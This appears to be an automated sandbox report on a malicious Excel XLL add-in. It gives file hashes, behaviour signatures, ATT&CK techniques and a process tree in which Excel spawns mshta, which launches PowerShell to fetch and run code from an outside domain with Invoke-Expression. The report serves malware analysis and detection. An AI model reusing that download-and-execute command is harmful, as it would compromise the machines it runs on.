Analysis

  • max time kernel
    137s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 19:13

General

  • Target

    cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6.xll

  • Size

    12KB

  • MD5

    7eef05a09734d3716ab632ea88485d7b

  • SHA1

    b41e0f20958206601f27dd8ac7ba6ca1a704f62b

  • SHA256

    cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6

  • SHA512

    0b81df9eb1d4da5688ed7cbf1724c43aa24114a47e57ae781eb5f613de7f63ac7768b614492afdb3f9ec25a3029347acff8e5cdb091f95f34168bdc7d6a61f4d

  • SSDEEP

    192:vZZL29RBzDzeobchBj8JONlONKyQru+rEPEjr7Ahy:H29jnbcvYJO2au+vr7Cy

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4744
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2960
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2896

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\Y19NSK22\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qxahoaw4.nbl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6.xll
    Filesize

    12KB

    MD5

    7eef05a09734d3716ab632ea88485d7b

    SHA1

    b41e0f20958206601f27dd8ac7ba6ca1a704f62b

    SHA256

    cd05631f476c7599f54d6a276fe8a3383ba6b7f153034db138503b71513945b6

    SHA512

    0b81df9eb1d4da5688ed7cbf1724c43aa24114a47e57ae781eb5f613de7f63ac7768b614492afdb3f9ec25a3029347acff8e5cdb091f95f34168bdc7d6a61f4d

  • memory/2896-56-0x0000000006860000-0x00000000068AC000-memory.dmp
    Filesize

    304KB

  • memory/2896-40-0x0000000005280000-0x00000000052B6000-memory.dmp
    Filesize

    216KB

  • memory/2896-42-0x0000000005890000-0x00000000058B2000-memory.dmp
    Filesize

    136KB

  • memory/2896-41-0x00000000058F0000-0x0000000005F18000-memory.dmp
    Filesize

    6.2MB

  • memory/2896-58-0x0000000006D00000-0x0000000006D1A000-memory.dmp
    Filesize

    104KB

  • memory/2896-57-0x0000000008060000-0x00000000086DA000-memory.dmp
    Filesize

    6.5MB

  • memory/2896-55-0x0000000006800000-0x000000000681E000-memory.dmp
    Filesize

    120KB

  • memory/2896-54-0x0000000006230000-0x0000000006584000-memory.dmp
    Filesize

    3.3MB

  • memory/2896-44-0x00000000061C0000-0x0000000006226000-memory.dmp
    Filesize

    408KB

  • memory/2896-43-0x0000000006150000-0x00000000061B6000-memory.dmp
    Filesize

    408KB

  • memory/4744-11-0x00007FF8881B0000-0x00007FF8883A5000-memory.dmp
    Filesize

    2.0MB

  • memory/4744-10-0x00007FF8461D0000-0x00007FF8461E0000-memory.dmp
    Filesize

    64KB

  • memory/4744-4-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-13-0x00007FF8461D0000-0x00007FF8461E0000-memory.dmp
    Filesize

    64KB

  • memory/4744-85-0x00007FF8881B0000-0x00007FF8883A5000-memory.dmp
    Filesize

    2.0MB

  • memory/4744-5-0x00007FF88824D000-0x00007FF88824E000-memory.dmp
    Filesize

    4KB

  • memory/4744-12-0x00007FF8881B0000-0x00007FF8883A5000-memory.dmp
    Filesize

    2.0MB

  • memory/4744-2-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-0-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-3-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-9-0x00007FF8881B0000-0x00007FF8883A5000-memory.dmp
    Filesize

    2.0MB

  • memory/4744-1-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-7-0x00007FF8881B0000-0x00007FF8883A5000-memory.dmp
    Filesize

    2.0MB

  • memory/4744-8-0x00007FF8881B0000-0x00007FF8883A5000-memory.dmp
    Filesize

    2.0MB

  • memory/4744-65-0x00007FF8881B0000-0x00007FF8883A5000-memory.dmp
    Filesize

    2.0MB

  • memory/4744-81-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-82-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-84-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-83-0x00007FF848230000-0x00007FF848240000-memory.dmp
    Filesize

    64KB

  • memory/4744-6-0x00007FF8881B0000-0x00007FF8883A5000-memory.dmp
    Filesize

    2.0MB